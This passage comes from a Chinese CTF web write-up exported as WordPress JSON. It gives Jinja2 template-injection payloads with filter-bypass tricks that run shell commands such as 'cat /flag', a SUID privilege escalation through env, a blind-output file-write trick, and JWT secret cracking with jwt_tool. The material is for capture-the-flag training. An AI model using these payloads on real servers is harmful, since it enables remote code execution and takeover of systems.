requests.utils.quote(payload),<br \/>\n            timeout&#061;5<br \/>\n        )<\/p>\n<p>        text &#061; r.text<\/p>\n<p>        print(&#034;&#061;&#034; * 50)<br \/>\n        print(&#034;\u6d4b\u8bd5:&#034;, keyword)<\/p>\n<p>        # \u5224\u65ad\u5173\u952e\u5b57\u662f\u5426\u88ab\u8fc7\u6ee4<br \/>\n        if keyword in text:<br \/>\n            print(&#034;[&#043;] \u672a\u8fc7\u6ee4&#034;)<br \/>\n        else:<br \/>\n            print(&#034;[-] \u53ef\u80fd\u88ab\u8fc7\u6ee4&#034;)<\/p>\n<p>        # \u5e38\u89c1\u8fc7\u6ee4\u63d0\u793a<br \/>\n        filters &#061; [<br \/>\n            &#034;\u5371\u9669\u5173\u952e\u5b57&#034;,<br \/>\n            &#034;\u7981\u6b62&#034;,<br \/>\n            &#034;illegal&#034;,<br \/>\n            &#034;forbidden&#034;,<br \/>\n            &#034;blocked&#034;,<br \/>\n            &#034;filter&#034;<br \/>\n        ]<\/p>\n<p>        for f in filters:<br \/>\n            if f.lower() in text.lower():<br \/>\n                print(&#034;[!] \u53d1\u73b0\u8fc7\u6ee4\u63d0\u793a:&#034;, f)<\/p>\n<p>        print(&#034;\u54cd\u5e94\u957f\u5ea6:&#034;, len(text))<\/p>\n<p>    except Exception as e:<br \/>\n        print(&#034;\u8bf7\u6c42\u9519\u8bef:&#034;, e)<\/p>\n<p>for t in tests:<br \/>\n    check(t)<\/p>\n<p>\u8fc7\u6ee4\u4e86\u4e0b\u9762\u7684<\/p>\n<p>__class__<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\n__base__<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\n__subclasses__<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\n__globals__<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nimport<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nself<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nsession<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nlipsum<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\ncycler<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nnamespace<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nJoiner<br \/>\n&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nget_flashed_messages<\/p>\n<p>url_for \u6ca1\u88ab\u8fc7\u6ee4&#xff0c;\u7528\u8fd9\u4e2a{{url_for.__globals__[&#039;os&#039;].popen(&#039;cat \/flag&#039;).read()}}&#xff0c;\u8fd9\u91cc\u9762\u7684\u5173\u952e\u5b57\u7528 join \u6362\u4e00\u4e0b\u3002<\/p>\n<p>globals  dict(glob&#061;a,al&#061;b)|join<\/p>\n<p>{{url_for[dict(__glob&#061;a,als__&#061;b)|join][&#039;os&#039;].popen(&#039;cat \/flag&#039;).read()}}<\/p>\n<h3>EZSSTI_12<\/h3>\n<p>\u4e0a\u4e00\u9898\u8fd8\u80fd\u7528&#xff0c;{{url_for[dict(__glob&#061;a,als__&#061;b)|join][&#039;os&#039;].popen(&#039;cat \/flag&#039;).read()}} \u3002<\/p>\n<h3>EZSSTI_13<\/h3>\n<p>cat \/flag \u6ca1\u7ed3\u679c&#xff0c;\u4f46\u662f\u547d\u4ee4\u662f\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u7684&#xff0c;\u800c\u4e14 static \u76ee\u5f55\u4e5f\u8fdb\u4e0d\u53bb\u3002\u8fd9\u91cc\u5361\u4f4f\u4e86&#xff0c;\u770b\u4e86\u4e0b\u5eb7\u53ef\u5e08\u5085\u7684 wp &#xff0c;\u5f97 suid \u63d0\u6743&#xff0c;\u540c\u65f6\u961f\u53cb\u8bf4 env \u6709\u4e2a hint &#xff0c;\u770b\u4e00\u4e0b\u3002<\/p>\n<p>HOSTNAME&#061;29bee48b6372<br \/>\nOLDPWD&#061;\/opt\/___web_very_strange_42___<br \/>\nPORT&#061;80<br \/>\nHOME&#061;\/opt\/___web_very_strange_42___<br \/>\nPYTHONUNBUFFERED&#061;1<br \/>\nGPG_KEY&#061;A035C8C19219BA821ECEA86B64E628F8D684696D<br \/>\nPYTHON_SHA256&#061;8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78<br \/>\nWERKZEUG_SERVER_FD&#061;3<br \/>\nPYTHONDONTWRITEBYTECODE&#061;1<br \/>\nHINT&#061;\u7528\u6211\u63d0\u4e2a\u6743\u5427<br \/>\nPATH&#061;\/usr\/local\/bin:\/usr\/local\/bin:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin<br \/>\nLANG&#061;C.UTF-8<br \/>\nPYTHON_VERSION&#061;3.11.14<br \/>\nPWD&#061;\/opt\/___web_very_strange_42___<\/p>\n<p>\u518d\u7ed3\u5408\u5eb7\u795e\u7684 wp &#xff0c;\u9884\u671f\u89e3\u5e94\u8be5\u662f env \u540e\u770b\u5230\u63d0\u793a&#xff0c;\u7136\u540e\u60f3\u5230 suid \u63d0\u6743&#xff0c;\u7136\u540e\u7528\/usr\/local\/bin\/env\u63d0\u6743\u3002<\/p>\n<p>\u5148\u627e\u4e00\u4e0b\u53ef\u4ee5\u7528\u6765\u63d0\u6743\u7684\u3002<\/p>\n<p>{{url_for[dict(__glob&#061;a,als__&#061;b)|join][&#039;os&#039;].popen(&#039;find \/ -perm -4000 -type f 2&gt;\/dev\/null&#039;).read()}}\u3002<\/p>\n<p>\/usr\/bin\/mount<br \/>\n\/usr\/bin\/gpasswd<br \/>\n\/usr\/bin\/su<br \/>\n\/usr\/bin\/chsh<br \/>\n\/usr\/bin\/newgrp<br \/>\n\/usr\/bin\/chfn<br \/>\n\/usr\/bin\/umount<br \/>\n\/usr\/bin\/passwd<br \/>\n\/usr\/local\/bin\/env<\/p>\n<p>\u6b63\u597d\u5c31\u6709\/usr\/local\/bin\/env&#xff0c;\u6240\u4ee5{{url_for[dict(__glob&#061;a,als__&#061;b)|join][&#039;os&#039;].popen(&#039;\/usr\/local\/bin\/env cat \/flag&#039;).read()}}\u3002<\/p>\n<h3>EZSSTI_14<\/h3>\n<p>\u65e0\u56de\u663e&#xff0c;\u5199\u5165\u9759\u6001\u6587\u4ef6&#xff0c;{{url_for[dict(__glob&#061;a,als__&#061;b)|join][&#039;os&#039;].popen(&#039;mkdir -p \/app\/static;cat \/flag &gt; \/app\/static\/1.txt 2&gt;&amp;1&#039;).read()}}&#xff0c;\u518d\u8bbf\u95ee\/static\/1.txt\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>EZJWT<br \/>\nHS256 \u7b7e\u540d&#xff0c;\u8bd5\u8bd5\u7206\u7834\u5bc6\u94a5&#xff0c;\u8fd9\u91cc\u7528\u7684\u662f jwt_tool \u3002<br \/>\npython jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.2s6Ssv1pE5dLPJUWfaVI2apGc2nNC3jAhydYOrwOrMw -C -d rockyou.txt\u7ed3\u679c\u662f secret &#xff0c;\u7136\u540e\u6539<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[275,122],"topic":[],"class_list":["post-96588","post","type-post","status-publish","format-standard","hentry","category-server","tag-web","tag-122"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/96588.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"EZJWT HS256 \u7b7e\u540d&#xff0c;\u8bd5\u8bd5\u7206\u7834\u5bc6\u94a5&#xff0c;\u8fd9\u91cc\u7528\u7684\u662f jwt_tool \u3002 python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.2s6Ssv1pE5dLPJUWfaVI2apGc2nNC3jAhydYOrwOrMw -C -d rockyou.txt\u7ed3\u679c\u662f secret &#xff0c;\u7136\u540e\u6539\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/96588.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-27T15:32:30+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/96588.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/96588.html\",\"name\":\"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-08-27T15:32:30+00:00\",\"dateModified\":\"2026-08-27T15:32:30+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/96588.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/96588.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/96588.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/96588.html","og_locale":"zh_CN","og_type":"article","og_title":"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"EZJWT HS256 \u7b7e\u540d&#xff0c;\u8bd5\u8bd5\u7206\u7834\u5bc6\u94a5&#xff0c;\u8fd9\u91cc\u7528\u7684\u662f jwt_tool \u3002 python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.2s6Ssv1pE5dLPJUWfaVI2apGc2nNC3jAhydYOrwOrMw -C -d rockyou.txt\u7ed3\u679c\u662f secret &#xff0c;\u7136\u540e\u6539","og_url":"https:\/\/www.wsisp.com\/helps\/96588.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-08-27T15:32:30+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"15 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/96588.html","url":"https:\/\/www.wsisp.com\/helps\/96588.html","name":"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-08-27T15:32:30+00:00","dateModified":"2026-08-27T15:32:30+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/96588.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/96588.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/96588.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/96588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=96588"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/96588\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=96588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=96588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=96588"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=96588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}